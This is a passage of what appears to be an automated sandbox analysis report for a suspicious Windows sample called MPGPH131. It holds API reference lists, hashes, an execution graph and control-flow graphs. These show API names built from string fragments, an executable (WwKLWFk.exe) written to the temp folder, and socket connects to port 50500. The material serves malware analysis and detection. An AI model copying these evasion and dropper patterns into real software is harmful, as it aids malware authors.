                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00308051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00308060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
                                    • Instruction ID: 7827a7386969a2c6792d8b85567b88e87984226c76e62627ed2b2d9be5051957
                                    • Opcode Fuzzy Hash: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
                                    • Instruction Fuzzy Hash: 17912631D112089FDB1ACFA8CC95BAEFBB5FF45314F148259E400AB6D2DBB4A984C790
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00303C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
                                    • Instruction ID: 25b6af1d6b1ef03a353d3a9ca2296ef8d6a49f7e277e92037b8abede0b981f2a
                                    • Opcode Fuzzy Hash: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
                                    • Instruction Fuzzy Hash: F641F672910604ABCB05DF58DC85BAAFBB9EF45310F14822AF9149B6C1E774AA40CB95
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374AB9
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374AD2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003755DD
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003755F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
                                    • Instruction ID: a1eaed9266ab5c57f2e6cb6dd5f913d821faac2ffaefeed54e1e006097d704a5
                                    • Opcode Fuzzy Hash: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
                                    • Instruction Fuzzy Hash: 2D51E3B1C00258DFDF26DFA4CC85BDEBBB4AF05304F148259E449AB382D7786688CB51
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00379681
                                    Strings
                                    • type must be boolean, but is , xrefs: 00379772
                                    • type must be string, but is , xrefs: 003796E8
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000E.00000002.3728611752.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3728679441.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729238969.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3729391873.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3731286303.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733691113.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733794921.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733896497.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000E.00000002.3733992811.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
                                    • Instruction ID: ad3d3870c9bb876b4eb809998021c8d64e9696f1217ca5a486359f132af683f3
                                    • Opcode Fuzzy Hash: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
                                    • Instruction Fuzzy Hash: 12316EB1D002489FCB16EBA4D842F9E77A9DB14710F10836AF419DB7D6EB38AD04C755

                                    Execution Graph

                                    Execution Coverage:1.7%
                                    Dynamic/Decrypted Code Coverage:2%
                                    Signature Coverage:0%
                                    Total number of Nodes:247
                                    Total number of Limit Nodes:40
                                    execution_graph 24193 314ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23862 368330 23863 368377 23862->23863 23866 368348 std::locale::_Setgloballocale 23862->23866 23867 36b6b0 23863->23867 23865 36838a 23868 36b6d5 23867->23868 23869 36b7fc 23867->23869 23873 36b736 23868->23873 23874 36b743 23868->23874 23876 36b6ea 23868->23876 23890 302040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23869->23890 23871 36b801 23891 301fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23871->23891 23873->23871 23873->23876 23877 3dc950 std::_Facet_Register 2 API calls 23874->23877 23880 36b6fa std::locale::_Init std::locale::_Setgloballocale 23874->23880 23882 3dc950 23876->23882 23877->23880 23881 36b7ba std::locale::_Init std::locale::_Setgloballocale 23880->23881 23892 3e1e70 RtlAllocateHeap ___std_exception_copy __Getctype 23880->23892 23881->23865 23885 3dc955 std::_Facet_Register 23882->23885 23884 3dc96f 23884->23880 23885->23884 23887 301fa0 Concurrency::cancel_current_task 23885->23887 23893 3eb5ec 23885->23893 23886 3dc97b 23886->23886 23887->23886 23899 3ddd11 RtlAllocateHeap RtlAllocateHeap ___std_exception_destroy ___std_exception_copy 23887->23899 23889 301fe3 23889->23880 23890->23871 23891->23880 23898 3f44ed __Getctype std::_Facet_Register 23893->23898 23894 3f452b 23900 3ea8ff RtlAllocateHeap __dosmaperr 23894->23900 23895 3f4516 RtlAllocateHeap 23897 3f4529 23895->23897 23895->23898 23897->23885 23898->23894 23898->23895 23899->23889 23900->23897 23903 3e67f6 23904 3e6809 ___std_exception_copy 23903->23904 23909 3e654d 23904->23909 23906 3e681e 23916 3e1b9c RtlAllocateHeap ___std_exception_copy 23906->23916 23908 3e682b 23911 3e6559 std::locale::_Setgloballocale 23909->23911 23910 3e655f 23926 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23910->23926 23911->23910 23913 3e65a2 23911->23913 23917 3e66d0 23913->23917 23915 3e657a 23915->23906 23916->23908 23918 3e66f6 23917->23918 23919 3e66e3 23917->23919 23927 3e65f7 23918->23927 23919->23915 23921 3e67a7 23921->23915 23922 3e6719 23922->23921 23931 3e2c91 23922->23931 23926->23915 23928 3e6660 23927->23928 23929 3e6608 23927->23929 23928->23922 23929->23928 23940 3eb7fd SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23929->23940 23932 3e2caa 23931->23932 23933 3e2cd1 23931->23933 23932->23933 23941 3f3642 23932->23941 23937 3eb83d 23933->23937 23935 3e2cc6 23948 3f2a4b 23935->23948 23992 3eb71c 23937->23992 23939 3eb856 23939->23921 23940->23928 23942 3f364e 23941->23942 23943 3f3663 23941->23943 23955 3ea8ff RtlAllocateHeap __dosmaperr 23942->23955 23943->23935 23945 3f3653 23956 3e1e60 RtlAllocateHeap ___std_exception_copy 23945->23956 23947 3f365e 23947->23935 23949 3f2a57 std::locale::_Setgloballocale 23948->23949 23950 3f2a98 23949->23950 23952 3f2ade 23949->23952 23954 3f2a5f 23949->23954 23971 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23950->23971 23952->23954 23957 3f2b5c 23952->23957 23954->23933 23955->23945 23956->23947 23958 3f2b84 23957->23958 23970 3f2ba7 23957->23970 23959 3f2b88 23958->23959 23961 3f2be3 23958->23961 23977 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 23959->23977 23962 3f2c01 23961->23962 23963 3eb83d 2 API calls 23961->23963 23972 3f26a1 23962->23972 23963->23962 23966 3f2c19 23966->23970 23978 3f2272 RtlAllocateHeap RtlAllocateHeap std::locale::_Init std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 23966->23978 23967 3f2c60 23968 3f2cc9 WriteFile 23967->23968 23967->23970 23968->23970 23970->23954 23971->23954 23979 3fe404 23972->23979 23974 3f26e1 23974->23966 23974->23967 23975 3f26b3 23975->23974 23988 3e73d0 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23975->23988 23977->23970 23978->23970 23980 3fe41e 23979->23980 23981 3fe411 23979->23981 23984 3fe42a 23980->23984 23990 3ea8ff RtlAllocateHeap __dosmaperr 23980->23990 23989 3ea8ff RtlAllocateHeap __dosmaperr 23981->23989 23983 3fe416 23983->23975 23984->23975 23986 3fe44b 23991 3e1e60 RtlAllocateHeap ___std_exception_copy 23986->23991 23988->23974 23989->23983 23990->23986 23991->23983 23997 3f7d9e 23992->23997 23994 3eb72e 23995 3eb74a SetFilePointerEx 23994->23995 23996 3eb736 23994->23996 23995->23996 23996->23939 23998 3f7dab 23997->23998 24000 3f7dc0 23997->24000 24010 3ea8ec RtlAllocateHeap __dosmaperr 23998->24010 24004 3f7de5 24000->24004 24012 3ea8ec RtlAllocateHeap __dosmaperr 24000->24012 24001 3f7db0 24011 3ea8ff RtlAllocateHeap __dosmaperr 24001->24011 24004->23994 24005 3f7df0 24013 3ea8ff RtlAllocateHeap __dosmaperr 24005->24013 24007 3f7db8 24007->23994 24008 3f7df8 24014 3e1e60 RtlAllocateHeap ___std_exception_copy 24008->24014 24010->24001 24011->24007 24012->24005 24013->24008 24014->24007 24015 8b1000 24017 8b1044 GetPEB 24015->24017 24020 8b1077 GetTempPathA 24017->24020 24019 8b120b CreateFileA 24021 8b122d 24019->24021 24020->24019 24023 31db60 WSAStartup 24024 31dc56 24023->24024 24025 31db98 24023->24025 24025->24024 24026 31dc24 socket 24025->24026 24026->24024 24027 31dc3a connect 24026->24027 24027->24024 24028 31dc4c closesocket 24027->24028 24028->24024 24028->24026 24188 31e460 6 API calls 24029 4e108f4 GetCurrentHwProfileW 24030 4e10932 24029->24030 24031 3ea828 24032 3ea83b ___std_exception_copy 24031->24032 24037 3ea60a 24032->24037 24034 3ea850 24045 3e1b9c RtlAllocateHeap ___std_exception_copy 24034->24045 24036 3ea85d 24038 3ea618 24037->24038 24039 3ea640 24037->24039 24038->24039 24040 3ea647 24038->24040 24041 3ea625 24038->24041 24039->24034 24046 3ea563 24040->24046 24050 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 24041->24050 24044 3ea67f 24044->24034 24045->24036 24047 3ea56f std::locale::_Setgloballocale 24046->24047 24051 3ea5be 24047->24051 24049 3ea58a 24049->24044 24050->24039 24058 3f5d03 24051->24058 24057 3ea600 24057->24049 24075 3f5cc5 24058->24075 24060 3ea5d6 24065 3ea681 24060->24065 24061 3f5d14 24061->24060 24082 3f44ed RtlAllocateHeap RtlAllocateHeap __dosmaperr __Getctype std::_Facet_Register 24061->24082 24063 3f5d6d 24083 3f4473 RtlAllocateHeap __dosmaperr 24063->24083 24066 3ea693 24065->24066 24073 3ea5f4 24065->24073 24067 3ea6a1 24066->24067 24072 3ea6d7 std::locale::_Init 24066->24072 24066->24073 24084 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 24067->24084 24069 3e2c91 4 API calls 24069->24072 24070 3f3642 RtlAllocateHeap 24070->24072 24071 3f2a4b 4 API calls 24071->24072 24072->24069 24072->24070 24072->24071 24072->24073 24074 3f5dae SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 24073->24074 24074->24057 24076 3f5cd1 24075->24076 24077 3f5cfb 24076->24077 24078 3f3642 RtlAllocateHeap 24076->24078 24077->24061 24079 3f5cec 24078->24079 24080 3fe404 RtlAllocateHeap 24079->24080 24081 3f5cf2 24080->24081 24081->24061 24082->24063 24083->24060 24084->24073 24085 3e62a8 24086 3e62bb ___std_exception_copy 24085->24086 24091 3e6183 24086->24091 24088 3e62c7 24098 3e1b9c RtlAllocateHeap ___std_exception_copy 24088->24098 24090 3e62d3 24092 3e618f std::locale::_Setgloballocale 24091->24092 24093 3e6199 24092->24093 24095 3e61bc 24092->24095 24113 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 24093->24113 24096 3e61b4 24095->24096 24099 3e621a 24095->24099 24096->24088 24098->24090 24100 3e624a 24099->24100 24101 3e6227 24099->24101 24103 3e2c91 4 API calls 24100->24103 24112 3e6242 24100->24112 24125 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 24101->24125 24104 3e6262 24103->24104 24114 3f44ad 24104->24114 24107 3f3642 RtlAllocateHeap 24108 3e6276 24107->24108 24118 3f20ff 24108->24118 24112->24096 24113->24096 24115 3e626a 24114->24115 24116 3f44c4 24114->24116 24115->24107 24116->24115 24127 3f4473 RtlAllocateHeap __dosmaperr 24116->24127 24121 3f2128 24118->24121 24124 3e627d 24118->24124 24119 3f2177 24132 3e1de3 RtlAllocateHeap ___std_exception_copy __Getctype 24119->24132 24121->24119 24122 3f214f 24121->24122 24128 3f206e 24122->24128 24124->24112 24126 3f4473 RtlAllocateHeap __dosmaperr 24124->24126 24125->24112 24126->24112 24127->24115 24129 3f207a std::locale::_Setgloballocale 24128->24129 24131 3f20b9 24129->24131 24133 3f21d2 24129->24133 24131->24124 24132->24124 24134 3f7d9e RtlAllocateHeap 24133->24134 24137 3f21e2 24134->24137 24135 3f21e8 24145 3f7d0d RtlAllocateHeap __dosmaperr 24135->24145 24137->24135 24138 3f221a 24137->24138 24139 3f7d9e RtlAllocateHeap 24137->24139 24138->24135 24140 3f7d9e RtlAllocateHeap 24138->24140 24141 3f2211 24139->24141 24142 3f2226 FindCloseChangeNotification 24140->24142 24143 3f7d9e RtlAllocateHeap 24141->24143 24142->24135 24143->24138 24144 3f2240 24144->24131 24145->24144 24196 37c6a0 RtlAllocateHeap 24147 4e10879 GetCurrentHwProfileW 24148 3e2a20 24151 3e295e 24148->24151 24150 3e2a32 24153 3e296a std::locale::_Setgloballocale 24151->24153 24152 3e2971 24169 3ea8ff RtlAllocateHeap __dosmaperr 24152->24169 24153->24152 24155 3e2991 24153->24155 24157 3e2996 24155->24157 24158 3e29a3 24155->24158 24156 3e2976 24170 3e1e60 RtlAllocateHeap ___std_exception_copy 24156->24170 24171 3ea8ff RtlAllocateHeap __dosmaperr 24157->24171 24165 3f3d48 24158->24165 24162 3e29ac 24164 3e2981 24162->24164 24172 3ea8ff RtlAllocateHeap __dosmaperr 24162->24172 24164->24150 24166 3f3d54 std::_Lockit::_Lockit std::locale::_Setgloballocale 24165->24166 24173 3f3dec 24166->24173 24168 3f3d6f 24168->24162 24169->24156 24170->24164 24171->24164 24172->24164 24175 3f3e0f 24173->24175 24178 3f3e55 24175->24178 24179 3f3ab3 24175->24179 24176 3f3e70 24183 3f4473 RtlAllocateHeap __dosmaperr 24176->24183 24178->24168 24182 3f3ac0 __Getctype std::_Facet_Register 24179->24182 24180 3f3aeb RtlAllocateHeap 24181 3f3afe __dosmaperr 24180->24181 24180->24182 24181->24176 24182->24180 24182->24181 24183->24178 24197 314a90 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 23901 4e10806 GetCurrentHwProfileW GetCurrentHwProfileW 24202 308b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24205 302540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Init 24203 31a100 7 API calls 3 library calls 24192 4e10696 GetCurrentHwProfileW

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 8b1044-8b1074 GetPEB 1 8b1077-8b109a 0->1 2 8b109d-8b10a0 1->2 3 8b11ee-8b122b GetTempPathA CreateFileA 2->3 4 8b10a6-8b10bc 2->4 11 8b122d-8b1230 3->11 12 8b1265-8b1269 3->12 5 8b10be-8b10c5 4->5 6 8b1110-8b1116 4->6 5->6 10 8b10c7-8b10ce 5->10 8 8b1129-8b112f 6->8 9 8b1118-8b111f 6->9 14 8b1148-8b114e 8->14 15 8b1131-8b1138 8->15 9->8 13 8b1121-8b1124 9->13 10->6 16 8b10d0-8b10d7 10->16 18 8b1232-8b1238 11->18 19 8b11bb-8b11c0 13->19 21 8b1150-8b1157 14->21 22 8b1167-8b116f 14->22 15->14 20 8b113a-8b1141 15->20 16->6 17 8b10d9-8b10dd 16->17 17->6 23 8b10df-8b10e3 17->23 26 8b123a-8b1242 18->26 27 8b1246-8b1251 18->27 29 8b11c2-8b11c5 19->29 30 8b11e0-8b11e9 19->30 20->14 28 8b1143-8b1146 20->28 21->22 31 8b1159-8b1160 21->31 24 8b1188-8b118e 22->24 25 8b1171-8b1178 22->25 23->19 32 8b10e9-8b110b 23->32 34 8b1190-8b1197 24->34 35 8b11a7-8b11ad 24->35 25->24 33 8b117a-8b1181 25->33 26->18 36 8b1244 26->36 42 8b1255-8b1261 27->42 28->19 29->30 37 8b11c7-8b11ca 29->37 30->2 31->22 38 8b1162-8b1165 31->38 32->1 33->24 39 8b1183-8b1186 33->39 34->35 40 8b1199-8b11a0 34->40 35->19 41 8b11af-8b11b6 35->41 36->42 37->30 43 8b11cc-8b11cf 37->43 38->19 39->19 40->35 45 8b11a2-8b11a5 40->45 41->19 46 8b11b8 41->46 42->12 43->30 47 8b11d1-8b11d4 43->47 45->19 46->19 47->30 48 8b11d6-8b11d9 47->48 48->30 50 8b11db-8b11de 48->50 50->3 50->30
                                    APIs
                                    • GetTempPathA.KERNELBASE(00000104,?), ref: 008B11FA
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 008B1223
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFilePathTemp
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 1031868398-1035807574
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: c96851f0987c8afbc2e98fb2e1eb046562e801de2c9ffb537dba27b6c6383483
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 25612975D01219DBCF24CF98C8A8AEEF7B4FB44315FA4926AD605AB301C3309A81CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 31db60-31db92 WSAStartup 52 31dc66-31dc6f 51->52 53 31db98-31dbc2 call 307d20 * 2 51->53 58 31dbc4-31dbc8 53->58 59 31dbce-31dc14 53->59 58->52 58->59 61 31dc60-31dc65 59->61 62 31dc16-31dc1c 59->62 61->52 63 31dc74-31dc7e 62->63 64 31dc1e 62->64 63->61 69 31dc80-31dc88 63->69 65 31dc24-31dc38 socket 64->65 65->61 67 31dc3a-31dc4a connect 65->67 70 31dc70 67->70 71 31dc4c-31dc54 closesocket 67->71 70->63 71->65 72 31dc56-31dc5a 71->72 72->61
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0031DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0031DC2D
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0031DC42
                                    • closesocket.WS2_32(00000000), ref: 0031DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500
                                    • API String ID: 3098855095-2230786414
                                    • Opcode ID: 3f3aec8bfdeed507a4a5827318761ae281ce7c5ebfe7fcf0d35fcb71051dc98a
                                    • Instruction ID: b41ad51c8287d9d88a5de3419a79bd1aa1239a4dc479b51a9dbb01d3fae57517
